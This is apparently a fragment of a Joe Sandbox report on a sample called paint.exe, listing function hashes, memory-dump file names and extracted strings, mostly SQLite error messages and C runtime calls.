                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4225454184-0
                                                                                                                                                                                                                                                                • Opcode ID: 2db2c3c66d5ac1fca2ba80e9efd88c0aaff962aced3a1b146ac441fe06bb1eef
                                                                                                                                                                                                                                                                • Instruction ID: b49f15bada415447a207f70b147077d0d91f12738799464a4c5328632b63cb47
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2db2c3c66d5ac1fca2ba80e9efd88c0aaff962aced3a1b146ac441fe06bb1eef
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A219162B0A74283D7649F16B5525BEA361FB45BC4B045135EBEE47FEACF2CE0508300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1956198572-0
                                                                                                                                                                                                                                                                • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                                • Instruction ID: fec8874e5c695777c2cc03d451db32959966f9dd72c11fc4c890c18a75053bb9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B611E921A1D582A2F75487A9E6446799253EF96780FC88030DB6B47BCAED3ED4958200
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013426793.00007FFDFAA01000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDFAA00000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013391762.00007FFDFAA00000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAA62000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAAAE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAAB2000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAAB7000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAB0F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAB14000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAB17000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013772305.00007FFDFAB18000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013801898.00007FFDFAB19000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaa00000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                • Opcode ID: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
                                                                                                                                                                                                                                                                • Instruction ID: e631c1b0d7648dc68c162f743712aa8a2ac18cef600d4e7486e7f1de47392216
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8113026B14F128AEB44CF60E8687B833A4FB19758F445E31DA6D467A8DF7CD159C380
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                                                • Instruction ID: eee3c823fc881fc21cfe4bc9e261bd79af26559fa7f61b5d06186eabb499b955
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D111866B18B05DAEB00CBA0E8552A933A4FB19758F441E35DA6E877A4EF78D1588340
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                                                                • API String ID: 4225454184-2410398255
                                                                                                                                                                                                                                                                • Opcode ID: 5081886879a1dcb09f1a8e8b481931c42fe165402a51258c3fdd95875b174ecb
                                                                                                                                                                                                                                                                • Instruction ID: 3c82d36648f4c94d52b5a83cca664633b4e9acaf9ca506bb0e748cd17cef9fb8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5081886879a1dcb09f1a8e8b481931c42fe165402a51258c3fdd95875b174ecb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4EC1F762F4E64386FB209A15C5A1B7C67A0EF53B88F044135DB6E47BF9DE2CE845A310
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: string or blob too big
                                                                                                                                                                                                                                                                • API String ID: 4225454184-2803948771
                                                                                                                                                                                                                                                                • Opcode ID: be8481eede363739fed0dd66ea1266317cdb0fd6630cb3dce840037493bb10fc
                                                                                                                                                                                                                                                                • Instruction ID: e4713aa2632bf0c8cdb000c4fe68849246abc3d5ac334359b4aa6bef341e0124
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be8481eede363739fed0dd66ea1266317cdb0fd6630cb3dce840037493bb10fc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9919C22F0A20385FB649B11D475BB96790AF8AB88F044135EE6D073F9EE7CE445A348
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                                                                • API String ID: 4225454184-515162456
                                                                                                                                                                                                                                                                • Opcode ID: e09e6fc5d94e09abd608d9723023e8c641209e6c7ffc6cc065591c134ea0245c
                                                                                                                                                                                                                                                                • Instruction ID: d7ba1b4196c45079dddf1c6e0ce2fc395b69c297ca2558314e8bd1151c9b8067
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e09e6fc5d94e09abd608d9723023e8c641209e6c7ffc6cc065591c134ea0245c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F81D072B0A64395EB10DB01D864FB97BA9FB52B84F458536DA6C0B6E8DF3CE541E300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: BINARY$no such collation sequence: %s
                                                                                                                                                                                                                                                                • API String ID: 4225454184-2451720372
                                                                                                                                                                                                                                                                • Opcode ID: 36039a166d4566c31a86ab3c78b31d94099c0d7d54d1d41b2e9264962882269a
                                                                                                                                                                                                                                                                • Instruction ID: 2d959c14ea98b544a35c120cb0cf35d5d6a1d4d30be059f93470ebf380e3a779
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36039a166d4566c31a86ab3c78b31d94099c0d7d54d1d41b2e9264962882269a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB71B362B0AA4351EB189F2195607B96391EB56BA8F484331DE3C072EDDF3CE591D340
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: index '%q'
                                                                                                                                                                                                                                                                • API String ID: 0-1628151297
                                                                                                                                                                                                                                                                • Opcode ID: 83d82f952d34810ecc43121b50ff9fb09ba70e6d899240e5dfbbe69747771c2e
                                                                                                                                                                                                                                                                • Instruction ID: d3c416d663be05e3eb4991b72562b13d35a4656030fffeaf159d3515e1d51687
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83d82f952d34810ecc43121b50ff9fb09ba70e6d899240e5dfbbe69747771c2e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6271AE72F0964699EB119B65D460ABC3BA0FB45BA8F000636DE2E57BE9DF389441D700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: %02d
                                                                                                                                                                                                                                                                • API String ID: 4225454184-896308400
                                                                                                                                                                                                                                                                • Opcode ID: 08179e3aae8af29205a3e48a38053d8be4b8d1364f403436d80ec9c05871a375
                                                                                                                                                                                                                                                                • Instruction ID: 137ecf1cb55acb62c4421131b5fbb3b2ddcd45829b286b7d7366111fc1e10b97
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08179e3aae8af29205a3e48a38053d8be4b8d1364f403436d80ec9c05871a375
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E71CE32B1A69789E7208F64E461BFD7761FB85788F104032EE9D17AADDE38E445DB00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,00000000,00000001,00007FFDFB0FD9BA,?,?,?,00007FFDFB0FDD7B), ref: 00007FFDFB0FD927
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: CRE$INS
                                                                                                                                                                                                                                                                • API String ID: 4225454184-4116259516
                                                                                                                                                                                                                                                                • Opcode ID: c8cc279459b7dc3839fdcad3baef5842beab7df88b6cdea28414d4f9614c85f6
                                                                                                                                                                                                                                                                • Instruction ID: c5c2e6b65aa0e2713ae97ee0d8eeb8316288715d35e6a95a6acd57708377b6c0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8cc279459b7dc3839fdcad3baef5842beab7df88b6cdea28414d4f9614c85f6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C518122B0B68341EB609B169470A796B91FF82FC4F548235DD6D4B7EDDE3CE402A380
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                                • Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                                                                                • Instruction ID: 50afb2f535af5cd588d30a6cce8bf657457c97fc794cc3acbba9ef9be5b012a1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92412726A0C38262FF209B6594013795698EB82BA5F904235EF7F87BD5FF3ED4418700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE90B6
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BEA9B8: HeapFree.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9CE
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BEA9B8: GetLastError.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9D8
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6F0BDCC15), ref: 00007FF6F0BE90D4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                                • API String ID: 3580290477-805208900
                                                                                                                                                                                                                                                                • Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                                                                                                                                                                                                                                • Instruction ID: 5fa3d13b04e764bf0fb41abbcfc1196389664612a6ee61fba1c50a048ba0f767
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F417F36A08B53A6EB14DF25D4400BD63A4EF467D0B954075ED6F83BC6EE3EE4958340
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                • API String ID: 4225454184-2766056989
                                                                                                                                                                                                                                                                • Opcode ID: 6aeb7031c098a32b12fcbd9a89e04e02ea86af416b89c4cbacbb9356da985678
                                                                                                                                                                                                                                                                • Instruction ID: ca4d5a29186fd14719bbf001966855365b2c8905bf37e2120ff2880e88d1ddbb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6aeb7031c098a32b12fcbd9a89e04e02ea86af416b89c4cbacbb9356da985678
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E41C2A2F0F6838AF7519B25A8719F56391AF4A788F044139D86D026FEDF6CB088D744
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
